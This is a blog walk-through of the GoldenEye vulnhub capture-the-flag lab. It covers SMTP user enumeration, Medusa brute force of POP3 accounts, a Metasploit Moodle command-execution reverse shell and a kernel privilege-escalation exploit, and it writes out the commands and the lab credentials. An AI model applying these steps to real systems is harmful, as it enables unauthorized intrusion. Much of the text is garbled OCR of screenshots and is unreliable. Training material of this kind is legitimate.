Infrastructure

GoldenEye CTF

2019
bordergate

This article covers a brief walk-through of a Goldeneye themed vulnhub system. Based on the systems description, brute forcing was going to be key;

  • No extra tools other than what’s on Kali by default
  • Any brute forcing will only need fasttrack.txt or less

Scanning & Enumeration

I started by port scanning the system. POP3 looks like a good brute force candidate.

nmap -sv -p- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 18:41 EST Nmap scan report for 192.168.0.108 Host is up (ø.oee23s latency). Not shown: 65531 closed ports PORT 25/tcp 86/tcp STATE open open 55006/tcp open 55007/tcp open MAC Address: 08 SERVICE smtp http ss1/pop3 pop3 27;32 VERSION Postfix smtpd Apache httpd 2-4.7 ( (Ubuntu)) Dovecot pop3d Dovecot pop3d (Oracle VirtualBox virtual NIC)

Heading to the web server, a login console also appears to be available:

GoldenEye primary Admin X + @ 192.168.0.108 Most Visited O Offensive Security OKati Linux OKati Docs O Kali Tools O Exploit-DB Aircrack-ng Severnaya Auxiliary Control Station SECRET Accessing Server Identity Server Name: ..... ..... ...... . GOLDENEYE User: UNKNOWN Naviagate to /sev-home/ to logi

The source code (terminal.js) which shows this message reveals two potential user names, and an encoded password:

Golden* Primary Admin S x http://192.168.O.108/termiT x + @ view-source:http://192.168.O.108/terminaLjs MostVisited @Offensive Security @ KaliLinux @ Kali Docs @KaliTools @Exploit-DB •Aircrack-ng @Kali Forums var data I GoldenEyeText: •espanxbr/>Severnaya Auxiliary Control SECRET Server Id //Boris, make sure you update your default passwrd. //hy sources say M16 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.. // I encoded you belm€... / 'BTU Natalya says she can break your codes var altEIements for (var j — e. j < aUEtement5. length; var currentEtementId - aUEtement51jl.id; var currentEtementIdContent — datalOllcurrentEIementIdl; var element — docurnt.getEtementById(currentEIerntId); var devTypeText - currentEIementIdContent:

I decoded the password (InvincibleHack3r) with BurpSuite:

вигр - Тетрогагу Propct Вир RepeatU Не[р И;ег е rts Теп О нех теп О нех э о T.rqet Ргоху Spider •ntwder Repeater Сот р.тг Project decode

Connecting to the SMTP port, I used the VRFY command to check if these users exist on the system:

telnet 192. 25 Trying 192. 168.0. 108. connected to Escape character is ' 220 ubuntu GoldentEye SMTP Electronic-mail agent VRFY test 550 5.1.1 etest>: Recipient address rejected: user unknown in local recipient table VRFY Natalya 252 2.ø.o Natalya VRFY boris 252 2.ø.o boris VRFY james 550 5.1.1 <james:•: Recipient address rejected: User unknown in local recipient table

Logging in with the Boris/InvincibleHack3r account we appear to hit a dead end:

192.168.0.108/sev• home/ x + G) 192.168.0.108/sev-home/ •ecurity O Kali Linux O Kali Docs O Kali Tools O Exp'Oit-DB Aircrack-nq O Kali Forums O NetHunter O Kali Training Gettinq Started GOLDENEY is a Top Secret Soviet oribtal weapons project Since you have access you definitely hold a Top Secret clearance and quality to be a certified GoldenEye Netw'ork operator (GNO) Please email qualified9NO supervisor to•receive the online GoldenEye O*rators Training to become an uninistrator ye system have configured rpOp3 rvice to ru very high default port' •

Brute Forcing

Using Medusa and the fasttrack.txt wordlist, I attempted to brute force the passwords for the two accounts previously identified:

medusa -u boris -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -v 0
ACCOUNT ACCOUNT ACCOUNT ACCOUNT [ pop3] CHECK: CHECK . • Ipop31 [ pop3] CHECK: (pop31 FOUND : Host : Host: Host : Host: 192.168.ø. 192.168.0. 108 192.168.0. 108 192. 168.0, 108 (1 Of (1 ot (I Of user: 1, complete) 1, complete) I, complete) boris Password: User: boris (I Of I, user: borts (1 ot 1, User: boris (I Of I, ( succESSl secretl! e complete) O complete) e complete) password: Company123 (139 Of 221 complete) Passwo rd: companyl! (140 ot 221 complete) Passwo rd : secretl! (141 Of 221 complete)

Valid Account: boris:secret1!

medusa -u natalya -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -f
ACCOUNT ACCOUNT ACCOUNT CHECK: CHECK: FOUND: • Ipop31 H ( pop3] (pop31 [pop31 Host: Host: Host: 192. 192.168.0. 108 192. 168.0. 108 of (1 of user: o complete) User: natal ya t I, O comp Lete) 1, complete) User: natalya of 1, O complete) 1, O complete) User: natalya (1 of 1, O complete) natalya Password: bird Isoccessl Password password: Password: password! (10 I complete) sqlaccount (101 of 221 complete) bird (102 of 221 complete)

Valid Account: natalya:bird

I configured Claws mail to see if anything interesting appeared in these email accounts:

e File Edit View Message Tools Get Mail Send Compose subject) (No Subject) Inbox 1 item selected (9038) S ubject wea, Apr . Boris, Configuration Help - Claws Mail 3.17.3 9 Wastebin Reply All From Sender Date Spam Next 22 natalya@ubuntu 21/04/95(Fri) 22: o Size oosal 362B o new, O unread, 3 total (1.75Ka) Your cooperation with our syndicate witt pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file Within the root directory Of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn! Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminat codes we wilt push to our tinat stages. PS • Keep security tight or we witt be compromised.

This revealed more credentials:

username: xenia
password: RCP90rulez!

- Claws Mail 3.17.3 File Edit View Message Tools Configuration Help Sond Compose Reply All Sender Get Mail S subject Forward 9 Wastebin Spam From root@uäuntu Next Date Size 1023B • a Mailbox (MY Inbox sent Drafts Queue 8 Wastebin o o (No Inbc» (1023 a) Subject From: root@ubuntu 23 O O 5 total (3.35K8) Clear Date: Tue, 29 Apr 1995 -0700 (PDT) Ok Natatyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security. ..even if it's not, just enter it in under the guise of "security" .. .it'U get the change order escalated without much hassle : ) Ok, user creds are: username: xenia password: RCP90ruIez! Boris verified her as a valid contractor so just create the account ok? And if you didn't have the URL on outr internat Domain: severnaya-station.com/gnocertdir sure to edit your host file since you usually work remote off-network.... Since you' re a Linux user just point this servers IP to severnaya•station.com in /etc/hosts.

Logging into the URL mentioned in the email (severnaya-station.com/gnocertdir), presents us with a Moodle CMS website, where a message from Dr. Doak awaits..

Xenia X All Add Block Recent I (I) 09:24 PM: Greetings AS a Contractor to our GoldenEye I you. your aCCtNJnt been complete, mote courses WII on yow dasnmard. you nave ary questions me via email, not here. My emal username is.. or Chak "The coctor Training Scientist • Sr Level SL4AVisu GolcÉ•nEye Operations Center Sector Level 14 - N02 - id;998623-1334 campus a, Building 57, -8. sector 6, cube Phone 555-193-826 cell 555-836044 Office 555-846-9811 p onaJ 555-826-9923 Email: Please Recycle you print. Stay Green aka save the company money! "There's such a tning as Good Griet Just ask Charlie grown" • someguy "You miss ICXM ot the shots dont shoot at• Wayne G. THIS A SECURE MESSAGE DO NOT SENO UNLESS.

Poking around the Moodle application didn’t reveal much interesting, so time for more brute force:

medusa -u doak -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -f
ACCOUNT CHECK: ACCOUNT FOUND: ACCOUNT CHECK: Ipop31 Host: 192.168.0.108 (1 of 1, e complete) User: doak (1 of 1, e complete) password: goat (121 of 221 complete) [pop31 Host: 192.168.0.108 User: doak Password: goat [SUCCESSI [pop31 Host: 192 . 168 . O. 108 (I Of I. O complete) User: doak (I Of I. I complete) Password: dev (122 Of 221 complete)

Valid Account: doak/goat

Logging into the email account, more credentials were uncovered:

username: dr_doak
password: 4England!

- Claws Mail 3.17.3 File Edit View Message Tools Get Mail F older Send Compose Configuration Help Reply All Sender 101 Subject (No Suble'-t) (No subject) (No subject) (No subject) (No subject) (No subiect) Forward 9 Wastebin Spam From Next 'Date • 6 Mailbox (MY sent Drafts Queue 8. wastebin O O root@ubuntu 29/04/95(sat) 23 alec@janus.boss 22/04/95(sat) 22 natalya@ubuntu 21/04/95(Fri) 22: root@ubuntu 10/04/95(Mon) 2 root@127.o.o. l.c 02/04/90(Mon) 2 Size 3883 1023B 903B 362B 618B 533B 1 ted (588B) O O 6 total , Clear Subject From: doak@ubuntu Date: Tue, 30 Apr 1995 -0700 (PDT) James , If you're reading this, congrats you've gotten this far. You know how tradecraft works right? Because 1 don 't. Go to our training site and login to my account... -dig until you can exfiltrate further information. username: dr doak password: 4England!

Logging into the Moodle website using the Dr. Doak account, we find a s3cret.txt file:

'n My private files My private files - Mozilla F iretox G) severnaya-station.com/gnocertdir\user/filesvhp Most Visited Offensive Security O Kali Linux O Kali Docs Kali Tools O Exploit-DB You i' as Dt Doak LOOOuO My private files Home My profile My pnvate tiles r-hvigation • My home Site My p«otile Vien profile tor lames Manage my private tiles Forum Mes sages My private files Courses Settings My profile settings Edit profile • Chæve password Me-S s You are logged in as (Logout)

The contents of the file point to a .jpg file:

Open s3cret.txt e o t i U. _tOOtO o I was able to capture this apps admln cr3ds through clear txt. Text throughout most web apps within the GoldenEye servers are scanned, cannot add the cr3dentials here. Something juicy is Located here: /dirø07key/for-007 .jpg so 1 Also as you may know, the RCP-90 Is vastly superior to any other weapon and License to Kill is the only way to play. Plain Tot Tab Width: S Lnl. coll INS

Downloading the image shows the following.

Dr_ DO* … it is Good luck 007

And since it wouldn’t be a CTF without exiftool being required..

Ex1F tags Tag in exif for. 007 .jpg 'for-007 .jpg' ( 'Motorola i byte order): Image Description Manufacturer Resolution unit So f twa re Artist YCbCr Positioning x- Resolution Y -Resolution Exlf version I Value IGOIdenEye I Inch I linux I For James I Centred I unknown Exif Version Components Configuraly Cb Cr - User Comment FlashPixVersIon Colour Space IFor 007 I FlashPix Version I.e I Internal error (unknown value 65535) echo "eFdpbnRlcjE50TV41Q=• I base64 -d xWinter1995x! roo :

password: xWinter1995x!

Using the this password, I was then able to login as an admin to the Moodle application:

2.23: Administration: Server: Environment - Mozilla Firefox 'n 2.2.3: Administration: Sc x + @ severnaya-station.com/gnocertdir'admin/environmentphp MostVisited OOffensivesecurity O KaliLinux O KaliDocs OKa1iT001s OExp10it-DB GoldenEye Operators Training - Moodie Home Site administration Sewer Environment Aircrack-ng O Kali Forums O NetHunter You are as Ad mm (Logout) Up:late conunwnt My home Site My profile Courses Admin bookmarks this Settings My profile settings Site Notifications Registration Advanced teatwes Grades Location Plugns Environment Check your server suits current and tuture instalation requirements Moodle versi ph n ph p_ 22.3 (guild: 20120514) v Server checks port should be installed and enabled best gd posture s The xmlrpc is needed hub and services and Mooale ne%wking should be md enabled best rewlts GD is of images. Such as user prone images not be available if should be and enabled best is used improve support. such as locale IS is required we mnning 2.2.3 must irwtalled enabled version 8.3 is required and you ate running 9,322 version is required you are running 5-5-9-1.4.24 must irwtalled enabled should enabled best results

Remote Access

Metasploit includes a Moodle CMS module, which allows for code execution provided you have an admin account, so I thought I would give that a try.

ms-t.5 exploit( multi,'http,'moodle_cmd_exec) > show options Module options (exploit/mutti/http/moodte_cmd Name PASSWORD proxies RHOSTS RPORT SESSKEY SSI_ TARGETURI USERNAME VHOST Current Setting xwinter1995x! 192.168.0. les false / gnoce rtdir admin severnaya-station .com Requi red yes yes yes yes yes no exec) : Description Password to authenticate With A proxy chain of format The target address range or CIDR identifier The target port (TCP) The session key of the user to impersonate Negotiate SSL/TLS for outgoing connections The URI of the Moodie installation Username to authenticate with HTTP server virtual host Exploit target: Id Name Automatic

The module injects code into the aspell system path to gain a reverse shell, however my first attempt didn’t work out.

GoldenEye Operators Training - Moodle Home Site administration Server System paths My home Site My profile COWSeS this Setting s Site administration Regis t ration „ Actvanced features Courses GD version Path to du Path to a.sl»ll You as Blocks editing on System paths GD 2.x is installed v GO is installed the Version o' GD that is installed. The Version by is the that has change this unless you really know mat you're doing. Empty Path to du. Probably something like you enter this, that display directory contents will run rnLRh taster tor erectones vath a lot of tiles. X tktault: Lmptv To use spell-checking within the editor. you MUST have aspen 0.50 or later installed on pur server. and you must spcity the correct path to access the On systems. path is usually lusr/binJaspell, but it be Something

After some time poking around the site settings, this appeared to be because a different spell check system was being invoked. I headed over to Site Administration > Plugins > Text Editors and set the spell engine to PSpellShell:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image021.png

Success!

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image022.png

Privilege Escalation

After doing a “uname -a” it appears the system was running Kernel 3.13.0-32-generic which is vulnerable to the following exploit: https://www.exploit-db.com/exploits/37292. I copied the exploit across from my Kali system:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image023.png

Unfortunately, gcc wasn’t available to compile the exploit, however does have the Clang compiler installed:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image024.png

I modified the exploit so references to gcc were replaced with clang, and compiled it. This generated some warnings, but did produce an “a.out” executable:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image025.png

Executing it we get a root shell:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image026.png

Checking out the /root directory, we can see a .flag.txt file:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image027.png

Visiting the URL shows the flag has been captured:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image028.png

Victory. It’s quite a fun challenge with a couple of small curve-balls. Could be improved by the addition of Defense Minister Dmitri Mishkin 😉

Image result for goldeneye gif

Related Posts

Infrastructure

Active Directory Schema Modification

2024
bordergate
Infrastructure

Exploiting Tomcat

2024
bordergate
Infrastructure

Attacking MSSQL

2024
bordergate
Infrastructure

Golden gMSA Attacks

2024
bordergate